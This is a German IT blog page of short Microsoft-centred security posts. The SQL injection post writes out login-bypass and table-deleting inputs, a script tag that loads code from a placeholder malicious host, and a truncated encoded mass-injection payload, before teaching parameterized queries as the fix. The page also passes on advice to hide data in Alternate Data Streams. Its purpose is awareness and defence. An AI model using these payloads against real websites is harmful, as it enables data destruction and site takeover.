blog.atwork.at

news and infos about microsoft, technology, cloud and more

Kostenloses Anti-Virus-Zeugs

Für Privat-Anwender gibt es (zum Glück) mittlerweile eine Reihe von kostenlosen Virensuch- und Virenschutz-Programmen. Jörg Klemenz hat sich die Mühe gemacht, in seinem Blog C-Ko einige davon aufzuspüren (wie zum Beispiel Avast) und diese zu beschrieben und mit Links zu versehen. Sehen Sie am besten selbst im Blog hier: http://c-ko.blogspot.com/2007/02/kostenloses-anti-virus-zeugs.html

Tool gegen SQL Injection

Seit Ende Juni gibt es eine Hilfe für Entwickler und IT-Administratoren gegen SQL Injection in Websites vom Typ classic asp und zwar den Microsoft Source Code Analyzer for SQL Injection - June 2008 CTP (siehe auch Beitrag Totgesagte leben länger - so auch SQL-Injection). Das Tool benötigt das Microsoft .Net 3.0 Framework und ist ein Command line-Utility. Nach Entpacken des Download-Pakets empfiehlt sich daher ein erster Blick in Readme.html. Um eine einzelne asp-Seite zu prüfen, wird diese einfach mit dem /Input-Parameter aufgerufen: msscasi_asp.exe /Input=C:\wwwroot\myweb\login.asp Das Ergebnis könnte dann beispielsweise so aussehen: Microsoft (R) Source Code Analyzer for SQL Injection Version 1.3.30601.30622Copyright (C) Microsoft Corporation.  All rights reserved. RESULT has no typeC:\wwwroot\myweb\shopfunc.asp(600) : warning C80420: Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as THEGUID`591). Path summary:- {THEGUID}[THEGUID`591 : string_input] created on 'Parameter' (line 591)- {THEGUID}[THEGUID`591 : string_input] to {SQL, THEGUID}[THEGUID`591 : string_input] on 'Transfer' (line 599)- {SQL, THEGUID}[THEGUID`591 : string_input] to {SQL, THEGUID}[THEGUID`591 : $error] on 'Execute' (line 600): Lines: 591, 596, 599, 600 C:\wwwroot\myweb\shopfunc.asp(833) : warning C80420: Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as TABID`825).There are other instances of this error:Unvalidated function parameter possibly executed. Reported by Microsoft (R) Source Code Analyzer for SQL Injection on tracked object SQL (created as TABID`825).(line 843) ...etc. In dieser geprüften Seite werden also einige Meldungen ausgeworfen - Handlungsbedarf für den Entwickler. Das Tool kennt sechs Fehler: 80400, 80403, 80406, 80407, 80420 or 80421, wobei 80400-Warnungen die höchste Priorität besitzen und sofort behoben werden sollten. Wenn keine Meldungen ausgegeben werden, ist die Seite in Ordnung: msscasi_asp.exe /Input=C:\wwwroot\myweb\datefunc.asp Microsoft (R) Source Code Analyzer for SQL Injection Version 1.3.30601.30622Copyright (C) Microsoft Corporation.  All rights reserved. Weitere Schritte (und wie ganze Websites geprüft werden können) finden Sie in Getting started with Microsoft Source Code Analyzer for SQL Injection. Das Tool ist somit eine einfache Hilfe für den Security-Check von ASP-Websites. Beitrag von Toni Pohl

Für IT Professionals und solche, die es werden soll(t)en: Microsoft Baseline Security Analyzer 2.1

Schon ein Monat ist er alt - aber vielen (noch) unbekannt: Der Microsoft Baseline Security Analyzer 2.1 für Windows (MBSA). MBSA ist ein einfaches, kostenfreies Tool, welches ermöglicht den Sicherheitsstatus eines Windows-PCs anhand der Sicherheitsempfehlungen von Microsoft zu ermitteln. Dabei können übliche Schwachstellen und fehlende Patches entdeckt und die Systemsicherheit verbessert werden. MBSA ist vor allem für KMUs gedacht. Der Analyzer kann mit und ohne WSUS arbeiten. Das Tool enthält ein grafisches und ein Commandline-Interface und kann auch Remote Scans ausführen (also fremde PCs prüfen). MBSA 2.1 läuft ab Windows 2000 Service Pack 3 bis hin zum neuen Windows Server 2008, als x32 oder x64bit Applikation - je nach Betriebssystem gibt es mitunter einige Einschränkungen. Was ist neu an MBSA 2.1? Die neue Version unterstützt den aktuellen Windows Update Agent client (WUA - von Microsoft Update oder WSUS-Servern installiert), ebenso ein neues grafisches Interface für Vista und Windows Server 2008, vollen 64bit-Support, vulnerability assessment check support (VA - ja, was wär das Leben ohne tolle Abkürzungen?) und aktualisierte Checks für SQL Server 2005 und Windows XP Embedded platforms. Nach der Installation (als Administrator!) erfolgt die Überprüfung in einfachen Schritten: Das Ergebnis sieht dann beispielsweise so aus: Ein leicht zu lesender Report, der die einzelnen Themen übersichtlich zusammenfasst und zu jedem Thema Hinweise zur Überprüfung, zu den ermittelten Details und teilweise auch Links zur Behebung der Schwachstelle liefert. Beim Anklicken eines Links wird der entsprechende Report im Browser geöffnet. Hier geht es zum Download und zu den wirklich ausführlichen FAQs. Ein brauchbares Tool! Wir wünschen Secure Computing! Beitrag von Toni Pohl

Forefront: On demand Webcasts

Zur Forefront Familie stehen eine Reihe von Webcasts zur Verfügung, die teilweise bereits stattgefunden haben und deshalb on Demand abrufbar sind. In der Zusammenstellung sind jedoch auch Webcasts angeführt, welche noch stattfinden werden, diese sind mit einem * gekennzeichnet. Forefront Client Security Forefront Server Security Forefront Edge Security Forefront Stirling Sicherheit Allgemein Forefront Client Security: TechNet Webcast: Forefront Client Security Series: A Technical Overview of Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366183&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security (Part 1 of 2) (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366185&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security (Part 2 of 2) (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366194&culture=en-US TechNet Webcast: Forefront Client Security Series: Deploying Forefront Client Security in Large Enterprises (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366204&culture=en-US TechNet Webcast: Troubleshooting Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032343644&culture=en-US TechNet Webcast: How Microsoft IT Uses Forefront Client Security (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032366695&culture=en-US Forefront Server Security: TechNet Webcast: Technical Overview of Forefront Security for Exchange Server (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032348784&culture=en-US TechNet Webcast: Forefront Security for Exchange Deployment Best Practices (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377121&culture=en-US TechNet Webcast: Technical Overview of Forefront Security for SharePoint (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338141&culture=en-US TechNet Webcast: Forefront Security for SharePoint Content Filtering Drill-Down (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377096&culture=en-US TechNet Webcast: Securing SharePoint End-to-End with Microsoft Forefront (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377264&culture=en-US TechNet Webcast: Managing Exchange Server and SharePoint Protection with Forefront Server Security Management Console (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377108&culture=en-US TechNet Webcast: A Technical Introduction to Forefront Security for Communications Server (Level 300) * http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377127&culture=en-US TechNet Webcast: Technical Overview of Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338266&culture=en-US TechNet Webcast: Take Control with Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032326211&culture=en-US TechNet Webcast: Managing Messaging and Collaboration Security with the Forefront Server Security Management Console (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032352492&culture=en-US TechNet Webcast: Maximizing the Multiple Scan Engine Advantage in Forefront Server Security Solutions (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032341210&culture=en-US TechNet Webcast: 24 Hours of Exchange Server 2007 (Part 13 of 24): Maintaining Anti-Spam Systems (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032323323&culture=en-US TechNet Webcast: 24 Hours of Exchange Server 2007 (Part 14 of 24): Maintaining Antivirus (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032323327&culture=en-US Forefront Edge Security: TechNet Webcast: ISA Server 2006 Technical Overview (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032334107&culture=en-US TechNet Webcast: ISA Server 2006 Firewall and Proxy Services (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032334394&culture=en-US TechNet Webcast: Cool and Under-Utilized ISA 2006 Scenarios (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377117&culture=en-US TechNet Webcast: Overview of Forefront Edge Secure Access Technologies (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032338274&culture=en-US Forefront Stirling: TechNet Webcast: Forefront Code Name "Stirling" Technical Overview (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032377102&culture=en-US Sicherheit Allgemein: TechNet Webcast: Microsoft Malware Protection Center Overview (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032340082&culture=en-US Comprehensive protection for your client operating system, application servers, and the network edge http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032346757&culture=en-US Microsoft Webcast: Security Series (Part 5 of 8): Protecting Data from Malicious Software (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032336307&culture=en-US TechNet Webcast: How Microsoft IT Uses Network Access Protection to Manage Network Health (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032339511&culture=en-US TechNet Webcast: How Microsoft IT Defends Against Spam, Viruses, and E-Mail Attacks (Level 300) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032305763&culture=en-US TechNet Webcast: Security Features in Windows Vista (Level 200) http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032312729&culture=en-US Ebenso wert vorbei zu schauen: Forefront Website. Auf dieser Website werden auch gratis Testversionen der Produkte angeboten. Es stehen Evaluierungskopien (was für ein schönes eingedeutschtes Wort) für Exchange, Sharepoint, Client Security, und ISA Server zur Verfügung. Alternativ kann man an einem virtual Lab teilnehmen.   Beitrag von Martina Grom

Notebook = Koffer oder: Reisen mit einem Notebook

Mittlerweile hat fast jeder von uns sein Notebook auf Reisen dabei. Für den Business-Termin, für das Speichern der vielen Urlaubsfotos oder nur für die Kommunikation. Bei Einreise in die USA (und wahrscheinlich demnächst auch in andere Staaten) dürfen die Daten eines Notebooks durchsucht werden! Das ist schon seit längerem üblich und ist laut Entscheidung eines Berufungsgerichtes in den USA "mit dem Öffnen von Gepäckstücken gleichzusetzen". Das bedeutet, dass ein Zollbeamter verlangen kann, beispielsweise Browser-Cache und Mails anzuschauen, Dateien durchzusehen oder im schlimmsten Fall das Notebook zur weiteren Untersuchung zu konfiszieren (und erst nach Stunden wieder zurück zu kommen). Sehr oft werden Festplatten auch nach Fotos durchsucht, vor allem nach kinderpornografischem Material. Es sieht so aus, als wären die USA derzeit mehr daran interessiert, nach Fotos und Geschäftsdaten Ausschau zu halten als nach Terroristen. Nachdem die Verfahren nicht standardisiert sind, wird das Durchsuchen oft mit "security by curiosity" verglichen. Auch wenn man im Regelfall meist keine heiklen Daten mit sich führt - es kann schon unangenehm sein, wenn der eigene E-Mail-Verkehr, Urlaubsfotos oder auch Geschäftsdaten offen gelegt werden müssen. Und einem Zöllner erklären, dass die E-Mail an den Freund in Amerika über den US-Wahlkampf, Politik oder sonstigen versendeten Funstuff ironisch gemeint war... Der Rat von Experten lautet: Sensible Daten nicht verschlüsseln (denn das erweckt automatisch Verdacht), sondern diese in anderen, unscheinbaren Dateien zu verstecken, beispielsweise Inhalte an eine andere Datei anzuhängen (Alternate Data Streams). Am besten ist es, sensible Daten einfach nicht mitzuführen, sondern auf diese Remote (VPN) zuzugreifen. Siehe dazu auch die ORF Futurezone US-Flughäfen: Laptops als Datenkoffer Beitrag von Toni Pohl

Totgesagte leben länger - so auch SQL-Injection

Die guten alten Zeiten - da war alles noch einfacher. Oder doch nicht? Ich habe mal an einem größeren Shop-System programmiert - das war im Jahr 2000 - und dabei gelernt, dass man einige Dinge beachten muss: Funktionalität, Usability und ... Security. Ein SQL-Server-System ist ja eine feine Sache, aber es könnte dazu benutzt werden, um "bösen" SQL-Code abzusetzen - wenn man nicht ein paar grundlegende Dinge berücksichtigt. Die Bezeichnung "SQL-Injection" bedeutet, dass Eingaben (meist durch Webformulare oder präparierte URLs) um syntaktisch korrekte SQL-Befehle erweitert werden, sodass von Außen bösartiger Code eingeschleust werden kann, der Daten ändert oder löscht. Warum ist SQL Injection jetzt (noch) ein Thema? Es gab in den letzten Wochen und Monaten einige Mitteilungen, dass Systeme mit IIS und SQL Server durch SQL Injection verwundbar seien. Diese sind schlichtweg - falsch! Es handelt sich bei diesen Attacken nicht um Schwachstellen von Windows oder IIS oder SQL Server, sondern um Fehler von Software-Lieferanten oder Entwicklern. Damit Applikationen durch SQL Injection verwundbar sind, müssen die folgenden Voraussetzungen zutreffen: Websites und Applikationen, welche Classic ASP (oder auch PHP, od. ASPX) verwenden, die SQL Server (oder ähnliche SQL-Datenbanksysteme wie Oracle, MySQL, etc.) verwenden und SQL-Befehle ungefiltert zusammensetzen und ausführen (siehe Beispiel unten). Die Verantwortung für die Softwarelösungen liegt beim Entwickler selbst!Und hier herrscht leider immer noch viel zu wenig Focus von Software-Entwicklern im Bereich Security, denn sonst wären solche Attacken gegen Webseitensysteme nicht mehr erfolgreich! Wie funktioniert SQL-Injection? Auch darüber ist schon viel berichtet worden, hier ein einfaches Beispiel zur Funktionsweise. Angenommen, es gibt auf einer Webseite eine Login-Seite: Diese verwendet die Texteingaben ungefiltert und baut daraus einen SQL-String zusammen, welcher gegen die Datenbank abgesetzt wird: SELECT * FROM Users WHERE Username = 'max' and Password = 'geheim' Das schaut soweit ja fürs Erste funktionell aus - und als Ergebnis werden alle Datensätze mit diesem Filter geliefert - im Idealfall ein Datensatz mit dem User Max, wo sein Kennwort geheim ist. Max wird dann angemeldet und ... zurück zum Start! Ein findiger, böser Mensch kann nun folgendes versuchen: in der Annahme, dass die User-Abfrage so (oder ähnlich) funktioniert, kann er nun in die Textfelder folgendes schreiben: ' or '1'='1 und dasselbe beim Passwort. Was kommt beim Zusammensetzen des SQL-Befehls in der Login-Seite raus? SELECT * FROM Users WHERE Username = '' or '1'='1' and Password = '' or '1'='1' Die Texteingaben werden in das SQL eingesetzt und liefern somit immer WAHR. Und was liefert diese Abfrage? ALLE Benutzer aus der Users-Tabelle. Das bedeutet zum Beispiel, dass (bei einer Login-Seite) der anonyme Benutzer gleich als erster User in der Tabelle angemeldet wird. Blöd. Noch blöder: Wenn der Angreifer sich nicht damit begnügt, sondern dahinter noch ein böses SQL absetzt: 1'='1';DELETE FROM Users; Ganz schlecht. Damit wird beim Ausführen der Abfrage die ganze Users-Tabelle gelöscht. Dumm gelaufen - für den Betreiber der Website. Optimierung von SQL Injection Eine weitere Variante - diese ist ganz aktuell aus einem Logfile einer Website entnommen, die mit SQL Injection bearbeitet wurde: Statt od. zusätzlich zur Bedingung wird ein Script eingesetzt, welches aufgerufen wird, wenn die Tabelle ausgelesen und in einer Website angezeigt wird: <script src="http://www.---boeseseite---.com/b.js"></script> Und hier drinnen gehts dann mit Javascript weiter... die aufrufende Seite wird zur Umleitung oder (im besten Fall) unbrauchbar. Suchen Sie mal im Web nach "banner82.com" oder "adw95.com" - dann finden Sie ziemlich viele (auch prominente) Websites, die durch die aktuellen SQL-Injection-Angriffe "ge-hackt" wurden und diese Scripts intus haben oder hatten. Hier ein Beispiel, wie so eine infizierte Seite dann aussehen kann: Hier sind viele Attacken ausgeführt worden, sodass das Script mehrfach injiziert wurde und teilweise wieder unbrauchbar wird. Noch ein Hinweis zu banner82: Diese Attacke wird nicht ganz im Klartext injiziert, sondern kommt in etwa so daher: DECLARE @S%20VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641 ..... 6F7220 AS VARCHAR(4000)); EXEC(@S) Das SQL wird in einer Variable zusammengebastelt, lädt alle Tabellen und Spaltennamen in einer Schleife und versucht, das Script überall hineinzuschreiben und wird am Schluss mit EXECute ausgeführt. Eine weitere Steigerung: Mittlerweile ist es nicht mehr so, dass ein Hacker manuell versucht, in die Datenbank einer Website zu einzudringen, sondern die Angriffe werden automatisiert. Dazu bietet sich zum Beispiel an, ein API von Google od. einer anderen Suchmaschine zu benutzen: Suche alle Sites, wo Parameter (z.B. http://www.--eineseite--/article?id=xyz) übergeben werden.Versuche, an den Parameter ein ' anzufügen.Analysiere die Response der Seite, ob der gesendete Parameter korrektes Encoding besitzt. Wenn nein, dann ist die Website "offen" und ein Kandidat für SQL-Injection-Scripts! Schutz vor SQL Injection Die Lösung: Es gibt für alle Entwickler eine einfache Regel: All input is evil! Jede Eingabe muss vom Programm gefiltert oder kontrolliert werden. Das bedeutet: Keine SQL-Befehle mehr aus Eingabefeldern zusammensetzen. Auch schon in ADO (Classic ASP) gab es Parameter-Übergabe, natürlich auch in ASP.NET. Diese verhindert, dass Texteingaben ungültige Zeichen enthalten und somit bösartige SQL-Befehle ausführen können! Aus der Demo-Abfrage von oben wird: select TOP (1) UserID from Users where username = @username and password = @password und @username und @password werden als Parameter übergeben. In ASP.NET 2.0 (VB.NET) sieht das dann beispielsweise so aus: Dim conn As SqlConnectionDim cmd As New SqlCommandconn = New SqlConnection(ConnectionStrings("conn").ConnectionString)conn.Open()cmd = New SqlCommand(SQL, conn)cmd.CommandType = CommandType.Text ' od besser: .StoredProcedurecmd.Parameters.AddWithValue("@username", Me.txtUsername.Text)cmd.Parameters.AddWithValue("@password", Me.txtPassword.Text)UserID = cmd.ExecuteScalar()conn.Close() und schon hat SQL-Injection dank der Parameter-Übergabe keine Chance mehr. Das Ganze noch in einen Try..Catch Block, mit etwas Fehlerabsicherung versehen und man hat sauberen, sicheren Code (Hardcore-Entwickler mögen mir verzeihen - ich weiß, der Code kann effizienter formuliert werden aber das Beispiel dient nur zur Demonstration). Ziel dieses Artikels ist, das Bewußtsein zu diesem (eigentlich sehr alten) Thema zu fördern, die Funktionsweise zu demonstrieren und Entwickler anzuhalten, ihre Software sicher zu programmieren, damit keine mißbräuchliche Verwendung von öffentlich zugänglichen Webseiten möglich ist. Es gibt dazu eine Fülle von Anleitungen und Hilfen. Viel mehr zu diesem Thema und weitere Hilfestellung, wie man sich davor schützen kann, finden Sie in den folgenden Links: http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx - Microsoft´s call to action und weitere Infos: http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx - Scott Guthrie´s blog http://msdn.microsoft.com/en-us/library/ms998271.aspx - msdn: How To: Protect From SQL Injection in ASP.NET http://msdn.microsoft.com/en-us/library/bb671351.aspx - msdn: Explained – SQL Injection http://technet.microsoft.com/de-de/library/ms161953.aspx - technet: SQL Injection http://msdn.microsoft.com/en-us/library/aa224806.aspx  - Injection Protection Achja, es gibt natürlich auch zum Thema Programmieren im Internet einige weitere interessante Security-Themen: SQL Cross Site Scripting, Canonicalization Attacks (wußten Sie, wie viele Arten es gibt, eine URL anzugeben, zum Beispiel auch dezimal), Query String, Form, Cookie, HTTP Header-Manipulations und vieles mehr. Internet-Technologie ist toll, aber bietet eine Reihe von Angriffsmöglichkeiten. Bei Tauchern heißt der Abschiedsgruß "Gut Luft". Bei Entwicklern sollte es heißen "Secure coding"! ;-) Beitrag von Toni Pohl

Microsoft Patchday und Security Bulletins

Wahrscheinlich ist nur wenigen Administratoren bekannt, dass es im Microsoft TechNet eine Reihe von Informationen und Services gibt, welche über Patches, gestopfte Sicherheitslücken, Tools und Empfehlungen berichten. Das wird hiermit nachgeholt. ;-) Im Thema Sicherheit findet sich die Einstiegsseite Security Bulletin-Suche. Hier findet sich beispielsweise auch der Bulletin vom Mai 2008 - diesmal wurden drei als kritische Sicherheitslöcher und eines als mittleres Sicherheitsloch eingestuft und behoben. Empfehlenswert für System-Admins ist auch der Microsoft Security Bulletins RSS-Feed. Für Betreiber von MU, WU und WSUS finden sich in KB894199 Informationen über Änderungen dieser Dienste im Jahr 2008. Links: http://www.microsoft.com/germany/technet/sicherheit/bulletins/aktuell/default.mspx - Start http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms08-may.mspx - aktuell im Mai http://www.microsoft.com/germany/technet/sicherheit/bulletins/secrss.xml - der RSS-Feed http://support.microsoft.com/kb/894199 - MU, WU und WSUS Änderungen 2008 http://www.microsoft.com/germany/technet/sicherheit/default.mspx - Allgemeine Infos zum Them Sicherheit mit Tools zum Netzwerk-Schutz Beitrag von Toni Pohl

Windows XP SP3 ist (offiziell) da!

Es hätte eigentlich schon bis Ende April veröffentlicht werden sollen - aber nun ist es wirklich da: Das "letzte" Service-Pack für Windows XP: ServicePack 3. Grund für die Verzögerung waren Kompatibilitätsprobleme mit dem eigenen Microsoft Dynamics Produkten. Diese wurden in SP3 nun behoben. Das Whitepaper Windows XP Service Pack 3 Overview informiert über die Neuerungen. Enthalten sind u.a. Security-Patches für Web und Office-Applikationen. Es wurde die Produktaktivierung von Windows Vista und Windows Server 2003 SP2 hinzugefügt. Windows XP kann jetzt ohne Produktschlüssel installiert werden und für einen begrenzten Zeitraum laufen. Der Produktschlüssel kann dann später durch das "Genuine Advantage-Programm" eingegeben werden. Windows XP SP3 stellt auch sicher, dass alle verfügbaren Updates installiert sind und darüber hinaus einige neue Fähigkeiten von Windows Server 2008 genutzt werden können, wie etwa der Netzwerkzugriffsschutz Network Access Protection (NAP). Auch wurde Wi-Fi Protected Access 2 Unterstützung (WPA2) hinzugefügt. Durch das Peer Name Resolution Protocol 2.1 können XP-Computer über PNRP mit Vista-Rechnern kommunizieren, RDP 6.1 wird hinzugefügt. Neu kommen auch MMC 3.0, Windows Installer 3.1 sowie einige Verbesserungen in BITS 2.5, IPSec, Kryptografiemodulen und weitere Updates hinzu. IE7 ist nicht standardmäßig enthalten und als Update zum Download verfügbar. Windows XP Service Pack 3 enthält alle zuvor veröffentlichten Windows XP-Updates, einschließlich Sicherheitsupdates und Hotfixes. Hier gehts zum Download für x86 Systeme (etwa 313MB): Windows XP Service Pack 3  Beitrag von Toni Pohl

Der ultimative Viren-Scanner

Für Nicht-kommerziellen-Home-Use gibt es eine Reihe von Empfehlungen für den Virenscanner avast. avast des tschechischen Software-Herstellers ALWIL besitzt eine integrierte Anti-Spyware, Anti-Rootkit und eine Selbstschutzfunktion. Das Setup ist sehr einfach und das look & feel ansprechend - sprich einen Tipp wert! avast kann bis zu 60 Tage lang getestet werden, für die private Benutzung zu Hause ist danach nur eine Online-Registrierung nötig. Siehe auch die Artikel in Vistablog und WinFuture. Hier gehts zur Download-Seite von avast Home.

Exchange Hosted Filtering - Effiziente Spamabwehr

Wie bereits im Artikel über Greylisting und seine Auswirkungen auf manche Exchange 2003 Systeme angekündigt, hier ein paar nützliche Informationen zu einem neuen Service, welches von Microsoft angeboten wird: Exchange Hosted Filtering. Spam und seine Vermeidung gehört mittlerweile zu einem Lieblingsthema von mir. Mit Erstaunen stelle ich immer wieder fest, wie abhängig wir uns vom Medium E-Mail machen und dabei in Kauf nehmen, dass unsere E-Mails nicht ankommen, in einem Schwall von Junk in einem Spamordner versinken, wir täglich viel Zeit damit verbringen, Mails auszusortieren, unsere Handys mit Push E-Mail Funktionen verwenden um nur ja nix zu verpassen. Vor einigen Jahren, als das Thema richtig akut wurde, war ich eigentlich überzeugt davon, dass "man" (an wen habe ich damals bloß gedacht?)  das Problem des Junks mit seinen ganzen Auswirkungen in den Griff bekommen wird. Damals hatten wir noch herzige Spamraten von 30%, vielleicht 40%. Im Nachhinein betrachtet richtig süß. Jetzt kämpfen wir mit 95%, manchmal mehr. Und trotzdem ist das Medium E-Mail noch immer überall präsent. Zurück zum Thema, es soll ja nicht untechnisch werden. :-) Microsoft hat in seine aktuellen Exchange Versionen (mit aktuell meine ich Exchange 2007 und Exchange 2003 SP2) bereits den Intelligent Message Filter (IMF) integriert. Wer ihn nicht kennt: unbedingt anwerfen und in Betrieb nehmen, es lohnt sich! Der IMF arbeitet ähnlich wie der Junk E-Mail Filter von Outlook (seit Version 2003 mit an Board), nur serverseitig. E-Mails werden am Server geprüft, der Administrator kann im IMF einstellen, welche E-Mails in den Mailboxen der User landen. Jene, die als Spam identifiziert werden, werden entweder archiviert oder gelöscht. Alleine durch die sinnvolle Integration von IMF sparen Sie sich und Ihren Usern viele Sortierereien. Mutige (so wie ich) löschen die ausgefilterten E-Mails am Server ohne Archivierung. Warum? Weil sich nach einem gewissen Beobachtungszeitraum herausgestellt hat, dass keine E-Mails falsch gefiltert werden. Trotzdem würde ich Ihnen eine solche Beobachtung empfehlen, damit auch das für Ihr Unternehmen geeignete Filter-Level eingestellt wird.   Was jedoch sind die Exchange Hosted Filtering Services (EHF)? Auf der diesjährigen ITnT war ich sehr überrascht, wie unbekannt dieses Service unter den IT-Fachleuten leider noch ist. EHF ist ein Dienst, der dem IMF das Spamfiltern (nahezu) abnimmt. Funktionalität: genial! Mit Exchange Hosted Filtering wird von Microsoft weltweit ein vollständig gehostetes Managed Service für E-Mailschutz und Nachrichtenmanagement angeboten. Dabei werden für die Filterung der ein- und ausgehenden E-Mails eines Unternehmens mehrere weltweit verteilte Datenzentren genutzt. 100 Prozent aller bekannten Viren können auf diese Weise blockiert werden. Microsoft garantiert ein Abfangen von mindestens 95 Prozent aller eintreffenden Spam-Mails, garantiert wird auch eine Falsch-Richtig-Erkennungsrate von 1:250.000. Die Verfügbarkeit? 99,9%! Das Service läuft weltweit in verteilten Rechenzentren. Besonders fein ist, dass man es 30 Tage kostenlos testen kann. Damit hat jeder genügend Zeit, die Funktionalität zu testen und sich überzeugen zu lassen. Wie funktioniert das Service im Detail: es werden die MX-Records auf das Rechenzentrum von Microsoft umgelenkt. Damit werden E-Mails nicht mehr direkt an den Mailserver, sondern über das Microsoft Rechenzentrum zugestellt. Bei Microsoft erfolgt die Filterung der E-Mails. E-Mails, die als Spam identifiziert werden, landen in einem Quarantäne Ordner, der - je nach Konfiguration - von den Empfängern, oder nur vom Administrator einsehbar ist. Hier kann dann auch ein E-Mail in den Posteingang weiter geschickt werden, sollte es tatsächlich falsch gefiltert worden sein (False-Positive) oder sollte man an diesem speziellen Junk-Angebot gefallen gefunden haben. Die E-Mails im Quarantäne Ordner werden 14 Tage aufbewahrt, genug Zeit also, um dort ab & zu einen Blick hinein zu werfen. Zusätzlich kann Ihnen das Service helfen, Unternehmensrichtlinien in E-Mail durchzusetzen. Das Service queuet E-Mail bis zu 5 Tage lang - d.h. sollte der interne E-Mail Server nicht zur Verfügung stehen, ist auch hier gewährleistet, dass keine E-Mails verloren gehen. Zur Familie der Exchange Hosted Services gehören neben dem Exchange Hosted Filtering auch Exchange Hosted Archive, Exchange Hosted Continuity und Exchange Hosted Encryption. Übrigens: Exchange Hosted Filtering setzt nicht zwingend einen Exchange Server voraus. Wer von Ihnen mehr darüber wissen möchte oder Unterstützung möchte, kann sich gerne an mich wenden! Beitrag von Martina Grom

Deep Impact: Was Sie schon immer &uuml;ber Ihre Security Updates wissen wollten

Rechtzeitig vor dem Jahreswechsel wurde ein neues Blog von Microsoft ins Leben gerufen, in dem jetzt mehr Hintergrundinformationen zu Patches veröffentlicht werden. Die bisher üblichen Hinweise zu den Patches bleiben natürlich erhalten und werden durch das neue Angebot ergänzt. Titel des Blogs ist Security Vulnerability Research & Defense. Immerhin gibt es im Dezember bereits 2 (Beispiel)Einträge zu aktuellen Security-Bulletins. Das Team hat vor, jeden monatlichen Patchday zu posten. Ziel dieser Informationen ist, den fleißigen Windows-Update-Benutzern detaillierte technische Informationen zu geben. Ein weiterer Schritt in die richtige Richtung, denke ich. Natürlich gibt es Pro und Contras dazu. Um gleich einmal auf die Contras einzugehen: ja, es kann jetzt die Möglichkeit bestehen, dass durch die detaillierteren Informationen Hacker und andere böse böse Zeitgenossen auf die Idee kommen, noch schneller Schadcode zu entwerfen. Ungepatchte Systeme sind damit eventuell noch schneller angreifbar als bisher. Ein paar Zahlen gefällig? Allein im 1. Halbjahr 2007 wurden 3.400 Softwareschwachstellen entdeckt - verteilt über die gesamte IT-Industrie. Als Pro steht dagegen, dass mehr Informationen nicht schaden und damit auch das Sicherheitsbewusstsein weiterhin gestärkt wird. Da wir gerade beim Thema sind: immer wieder wert, kurz vorbei zu schauen:Technet Sicherheits ToolsTechnet Sicherheits ArtikelTechnet Sicherheits Webcasts. Für jene, die an den aktuellen Analysen zur IT-Sicherheit interessiert sind, hier der Link zum derzeit aktuellen Bericht. Beitrag von Martina Grom

So schaut Phishing aus

Und immer wieder kommen sie, die Phishing-E-Mails. Eigentlich zaubert eine solche E-Mail meist ein breites Schmunzeln auf mein Gesicht... Aber in Wirklichkeit gibt es wohl genügend Anwender, die darauf reinfallen. Also, um es klarzustellen: Es handelt sich um kriminelle Elemente (frei nach einem Song in Müllers Büro). Solche E-Mails sofort löschen - auf keinen Fall Links anklicken! Keine Bank fragt per E-Mail Kontodaten oder Aktualisierungen ab!! Ein ganz freches , aktuelles Beispiel sieht so aus: Von: <IrgendeineBANK> [rechnungen-83981062099116ib@<IrgendeineBANK>.de]Gesendet: Donnerstag, 22. November 2007 18:43An: **********Betreff: obligatorisch zu lesen [nachrichtenzahl: ja375836226703y] Sehr geehrter Kunde, sehr geehrte Kundin, Die Technische Abteilung der <IrgendeineBANK> führt zur Zeit eine vorgesehene Software-Aktualisierung durch, um die Qualität des Online-Banking-Service zu verbessern.Wir möchten Sie bitten, unten auf den Link zu klicken und Ihre Kundendaten zu 